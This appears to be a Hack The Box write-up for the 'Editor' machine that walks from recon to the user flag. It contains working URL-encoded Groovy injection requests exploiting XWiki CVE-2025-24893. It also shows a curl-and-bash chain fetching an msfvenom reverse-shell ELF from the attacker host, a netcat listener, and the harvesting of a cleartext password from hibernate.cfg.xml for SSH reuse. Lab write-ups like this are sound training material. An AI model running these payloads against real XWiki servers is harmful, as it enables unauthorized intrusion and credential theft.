Post

Editor

An unauthenticated Groovy injection in XWiki's SolrSearch endpoint (CVE-2025-24893) gives code execution as the xwiki service user; the Hibernate config leaks a cleartext database password that the local user oliver reuses for SSH, yielding the user flag.

Editor

Overview

Editor is an easy-difficulty Linux box. The web frontend advertises a code editor and links to an XWiki instance for its docs. That XWiki is version 15.10.8, vulnerable to CVE-2025-24893 — an unauthenticated remote code execution flaw in the SolrSearch endpoint that evaluates attacker-supplied Groovy. From a shell as the xwiki service user, the Hibernate database config leaks a cleartext password that the system user oliver reuses, so a straight SSH login lands the user flag. This post covers recon through user.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

CVE is the whole foothold: unauthenticated XWiki CVE-2025-24893 Groovy injection RCE plus a reused Hibernate DB password for SSH, with little enumeration or custom effort.

Recon

PortServiceNotes
22/tcpOpenSSH 8.9p1Ubuntu
80/tcpnginx 1.18.0“SimplistCode Pro” static site
8080/tcpJetty 10.0.20XWiki, proxy to the same wiki
1
2
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.10 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.10

Port 80 is a static marketing page for “SimplistCode Pro.” The Docs link in the navbar points at wiki.editor.htb/xwiki, and port 8080 proxies to the same wiki. Add the vhost to /etc/hosts:

1
echo "10.10.10.10 editor.htb wiki.editor.htb" | sudo tee -a /etc/hosts

Browsing the wiki, the footer reveals the version: XWiki Debian 15.10.8.

Enumeration

XWiki 15.10.8 is vulnerable to CVE-2025-24893, an unauthenticated RCE in the SolrSearch endpoint. The RSS feed path renders wiki content — including `` macros — without authentication or sandboxing, so an anonymous GET can run server-side Groovy.

A public PoC URL-encodes a payload that decodes to:

1
}}}println("id".execute().text)

The `` wrapper forces the block to render uncached so command output is reflected back inside the RSS XML. Verify with a benign id:

1
curl -s "http://wiki.editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22id%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D"

The response embeds uid=997(xwiki) ... — confirmed RCE as the xwiki user.

Foothold

A direct reverse-shell string in the Groovy payload fails on this box, so the reliable route is to stage an ELF. Build a reverse shell, host it, and drive the download/exec in three separate Groovy command executions.

1
2
3
nc -lvnp 4444
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f elf > shell
python3 -m http.server 80

Step 1 — download the ELF to /tmp/shell:

1
curl -s "http://wiki.editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22curl%2010.10.14.10%2Fshell%20-o%20%2Ftmp%2Fshell%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D"

Step 2 — make it executable, then Step 3 — run it (swap chmod%20%2Bx%20%2Ftmp%2Fshell and bash%20%2Ftmp%2Fshell into the same payload). The listener catches a shell as xwiki:

1
2
3
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.10] 40530
whoami
xwiki

Now find the database config. XWiki stores its connection settings — including a cleartext password — in hibernate.cfg.xml:

1
2
find / -name "*hibernate.cfg.xml*" 2>/dev/null
grep -i "connection.password\|connection.username" /etc/xwiki/hibernate.cfg.xml
1
2
<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>

Checking for interactive users shows oliver has a home directory. The password is reused — SSH straight in:

1
2
3
4
ssh [email protected]
# password: theEd1t0rTeam99
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

User flag

1
2
oliver@editor:~$ cat user.txt
[redacted]

The netdata group membership is the thread for privilege escalation — but this post stops at user.

This post is licensed under CC BY 4.0 by the author.